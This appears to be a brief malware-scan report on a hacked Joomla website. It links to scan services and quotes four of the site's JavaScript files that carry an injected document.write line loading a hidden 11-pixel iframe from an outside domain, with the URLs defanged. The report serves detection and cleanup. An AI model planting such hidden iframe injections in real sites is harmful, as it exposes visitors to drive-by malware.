See: http://killmalware.com/carrydufffc.com/#
See: https://www.virustotal.com/nl/url/390e2c26c25c2391fbfea00a43cfe33924a7d4d4fb72bf8ded54f9ec7d74173b/analysis/
See: http://urlquery.net/report.php?id=9844640
Included scripts check:
Suspect - please check list for unknown includes
Suspicious Script:
carrydufffc dot com//components/com_jcomments/js/jcomments-v2.1.js?v=7
document.write(‘<iframe src=“htxp://gcogux.ns2.name/termasloda.cgi?7” scrolling=“auto” frameborder=“no” align=“center” height=“11” width="11
Suspicious Script:
carrydufffc dot com//components/com_jcomments/libraries/joomlatune/ajax.js?v=3
document.write(’<iframe src=“htxp://gcogux.ns2.name/termasloda.cgi?7” scrolling=“auto” frameborder=“no” align=“center” height=“11” width="11
Suspicious Script:
carrydufffc dot com//media/system/js/mootools.js
document.write(‘<iframe src=“htxp://gcogux.ns2.name/termasloda.cgi?7” scrolling=“auto” frameborder=“no” align=“center” height=“11” width="11
Suspicious Script:
carrydufffc dot com//media/system/js/caption.js
document.write(’<iframe src=“htxp://gcogux.ns2.name/termasloda.cgi?7” scrolling=“auto” frameborder=“no” align=“center” height=“11” width="11
On a misused and defaced server: http://worldguide.ag/clean-mx/portals.php?virusname=cysc.def.gen-3&sort=firstseen+DESC
pol